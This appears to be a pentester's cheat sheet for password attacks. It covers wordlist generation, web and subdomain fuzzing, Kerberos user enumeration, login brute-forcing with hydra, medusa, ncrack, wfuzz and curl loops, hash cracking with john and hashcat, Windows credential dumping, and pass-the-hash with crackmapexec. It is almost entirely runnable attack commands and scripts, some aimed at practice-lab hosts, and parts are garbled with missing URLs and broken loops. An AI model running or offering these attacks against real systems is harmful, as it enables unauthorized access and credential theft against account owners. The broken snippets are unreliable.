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Password Cracking

Good Post: Bruteforcing using Custom Scripts
crunch 8 8 -t Any_Characers -o list.txt

if you want to create something like Bha!!123

crunch 8 8 -t ,@@^^%%%

, = Upper case letter
@=lower case letters
^ = special characters
%= numbers
Generating Wordlist using kwprocessor

this is used for generating random passwords that users might use as a streak on the keyboard
example: qwertyuiop[]\

git clone

#Create a keyword based on routes users use to create passwords
./kwp basechars/full.base keymaps/en-gb.keymap routes/2-to-16-max-3-direction-changes.route > kwp.txt

Fuzzing for Webpages
wfuzz -c -w Rockyou.txt -z list,txt-php-html -u --hc 404,403 -t 100 

#show all responses except 404; -s --> negative responses
gobuster dir --url -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -s 404

#Fuzzing Webpages ; -b negative responses; -k --> ignore certificate errors
gobuster fuzz -k --url -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -b 404

#Fuzzing using dirsearch 
dirsearch -u -e html,php,txt,asp,aspx -x 404

Fuzzing Webpages using bash

for id in $(seq 1 10000); do echo "$id" done
Bruteforcing kerberos 

Github Usernames  Github Kerbrute

./kerbrute userenum --dc -d domain.local /usr/share/wordlists/kerberos_enum_userlists/Top_50_Female_Firstnames.Surname.txt
Fuzzing Hosts
wfuzz -w wordlist.txt -H "HOST: FUZZ.htb" -u --hc 400 --hh 8193 
Subdomain Brute Force

wfuzz -c -w subdomains-top1mil-5000.txt -H "HOST:FUZZ.redcross.htb" https://redcross.htb

*All Wordlists are from SecLists

Check for Non Existing responses, example 28 Words, so Lets grep out resposes which  gives out 28 Words as output

wfuzz -hw 28 -c -w subdomains-top1mil-5000.txt -H "HOST:FUZZ.redcross.htb" https://redcross.htb

add the found url's to /etc/hosts
SubDomain Bruteforce using wfuzz

wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt –H "HOST:FUZZ.bhanu.notes" –u --hc 400,301 -t 50 -c
Fuzzing using Wget 

#do not crawl the pages ending with the extensions, -R
wget -nd -r -R html,asp,php,aspx -P wordlist.txt

# crawl the pages ending with the extensions, -A
wget -nd -r -A doc,pdf,docx,xls -P wordlist.txt
Cewl for emails in the webpage

cewl -n -e > emails.txt
Bruteforcing Passwords - POST Using WFuzz

Intercept the admin login page request after entering Username and password & copy the FORM-LOGIN data


Firefox --> go to login page --> hit f12 --> network --> enter creds --> submit --> select POST request on network tab
--> headers tab --> click on "resend" and select "Edit and Resend" --> from there you can find the request body
use it for -d option
wfuzz -c --hh 11 -u "https://intra.redcross.htb/pages/actions.php" -X POST -d "user=FUZZ&pass=FUZZ&action=login" -w top-usernames-shortlist.txt Reference

Bruteforcing Passwords - POST Using WFuzz

wfuzz -X POST -u '' -d 'email=FUZZ&password=PASSWORD' -w emaillist --hc 200 -c

wfuzz -c --hw 16 -u "" -X POST -d "user=admin&password=FUZZ&type=login" -w ~/Downloads/Tools/rockyou.txt

wfuzz -c --hw 16 -u "" -d "user=admin&password=FUZZ" -z file,rockyou.txt

wfuzz -c -t 64 --basic access-admin:FUZZ -u -w 100k-most-used-passwords-NCSC.txt --hc 401

Cheatsheet Cheatsheet-2 
Brute Forcing Passwords using Curl
for pass in $(cat /usr/share/wordlists/rockyou.txt); do curl -k -u root:"$pass" ;echo $pass & done -------------------------------------------------------
if [ $# -ne 1 ];then
echo "Usage: ./script <input-file>"
exit 1

while read user pass; do
curl -iL --fail --data-urlencode user="$user" --data-urlencode password="$pass" 1>/dev/null 2>&1
if [ $? -eq 0 ];then
echo "ok"
elif [ $? -ne 0 ]; then
echo "failed"
done < $1 ----------------------------------------- url="" for user in $(userlist_gen); do for pass in $(passlist_gen); do http_code=$(curl -L --data-urlencode user="$user" --data-urlencode password="$pass" "$url" -w '%{http_code}' -o /dev/null -s) if [[ $http_code -eq 302 ]]; then echo "Success: User: '$user' Pass: '$pass'" break 2 fi done done -------------------------------------------- WORKS GOOD ------------------------------------------ url="" for pass in $(cat /usr/share/wordlists/rockyou.txt); do http_code=$(curl -k $url -u root:"$pass" -w '%{http_code}' -o /dev/null -s) if [[ $http_code -ne 401 ]]; then echo "Success: User: root, Pass: '$pass'" break 2 else echo "Wrong Password Root:$pass" fi done done

wpscan --url -P Wordlist.txt -U wordlist.txt -t 20

wpscan --url -e ap,t,u 

hydra -l admin -P wordlist.txt -v VICTIM_IP ftp

hydra -l username -P password_file.txt -s port -f ip_address request_method /path
hydra -l admin -P 1000_common_passwords.txt -s 8080-f http-get /index.html

For Wordpress:

hydra -L wordlist.txt -P wordlist.txt localhost -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^:invalid"

hydra -l username -P rockyou.txt http-post-form "/portal/xlogin/:ed=^USER^&pw=^PASS^:S=302"
Cracking Web Page Passwords using patator

patator http_fuzz auth_type=basic url=http://FILE0 user_pass=FILE1:FILE2 0=hosts.txt 1=users.txt 2=pass.txt -x ignore:code=401

Cracking Putty Private Key.ppk

sudo apt install putty-tools

#Genrate id_rsa for ssg logi
n, if it asks for password - Password needs to be cracked
puttygen private.ppk -O private-openssh -o id_rsa

putty2john private.ppk > hash

john --format=PuTTY --fork=4 hash -w=wordlist.txt

#Enter the cracked password
puttygen private.ppk -O private-openssh -o id_rsa

Cracking mysql Hashes

mysql -u root -p'passw@rd' -D database_name
show tables;
select * from tablename;

#sample hash

hashcat -m 500 hash /usr/share/wordlists/rockyou.txt
Cracking bitlocker Recovery key using John

john --format=bitlocker-opencl -mask=?d?d?d?d?d?d[-]?d?d?d?d?d?d[-]?d?d?d?d?d?d[-]?d?d?d?d?d?d[-]?d?d?d?d?d?d[-]?d?d?d?d?d?d[-]?d?d?d?d?d?d[-]?d?d?d?d?d?d target_hashPWDUMP/fgdump: Used to Dump Windows Passwords,  Needs Admin Privileges to work.

you can also use bitcracker 

Cracking Recovery key with JTR

just run fgdump.exe in cmd and hashes get dumped onto a text file.
/etc/shadow Hashes 

if the hashes start with

$1$ - MD5
_  - BSDi Extended DES
$2$ or $2a$ - Blowfish
$5$ - SHA-256
$6$ - SHA-512
Windows Credential Editor(WCE): 

wce64.exe -w
Passing the Hash to login to windows:


export SMBHASH=Copy_the_NTLM_Hash_FROM_fgdump

pthwinexe -U administrator% //Victim_IP cmd

Pass the Password

crackmapexec IP_Address -u username -d domain_name -p password

crackmapexec -u bhanu -d steins -p Welcome@1

Pass the Hash
Bhanu:500:132kjb214vb2jh42v4l324v2432j4v:4332k4b32kj4b32jh4v3243::  #copy the last set of hash

crackmapexec -u bhanu -d steins -H 4332k4b32kj4b32jh4v3243 --local 
Password Profiling: 

Creating Wordlists from a webpage or any source.

cewl -m 6 -w /root/wordlist-cewl.txt
Password Mutation:

nano /etc/john/john.conf 
$[0-9]$[0-9]        /Adding a rule in John to add 2 numbers after each word

john --wordlist=wordlist-cewl.txt --rules --stdout > mutated_pass.txt
            /Apply these rules to existing passwords
medusa -h VICTIM_IP -u admin -P wordlist.txt -M http -m DIR:/admin -T 20

ncrack -v -f --user administrator -P wordlist.txt rdp://VICTIM_IP,CL=1
        /Multiple Threads should not be used
LM and NTLM Hashes:
NT based till 2003 stored 2 diff hashes -> Lan Manager and NTLan manager

LM Hashing:  weak, password longer than 7 chars are split into 2 strings
password is converted to uppercase before being hashed. each part is hashed seperately, 
no Salts --> prone to Rainbow tables attack

NTLM Hashing: Started from Windows Vista; SAM


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